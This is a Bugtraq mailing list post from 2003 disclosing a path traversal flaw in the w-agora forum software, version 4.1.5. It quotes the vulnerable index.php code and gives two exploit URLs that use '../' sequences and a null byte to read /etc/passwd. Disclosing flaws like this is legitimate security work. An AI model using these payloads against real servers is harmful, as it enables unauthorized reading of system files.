Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Bug in w-agora

From: sonyy () 2vias com ar
Date: Sun, 12 Jan 2003 12:03:12 -0300
   =======================
   ==Shell Security Team==
   =======================


==============================
====Advisory For W-agora======
==============================

- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora


The bug :
==========

index.php

        if (empty($bn)) {
# No forum selected -> default to 'site' configuration
                $site = empty($site) ? "agora" : $site;

                $cfg_file = "${cfg_dir}/site_${site}.${ext}";
                $expnd = "all";
        } else {
                $cfg_file = "${cfg_dir}/${bn}.${ext}";
        }



Exploit :
=========


index.php

http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

And modules.php

http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1



Any Question :
==============

Sonyy --> Sonico60 () hotmail com
Previous By Date Next
Previous By Thread Next

Current thread: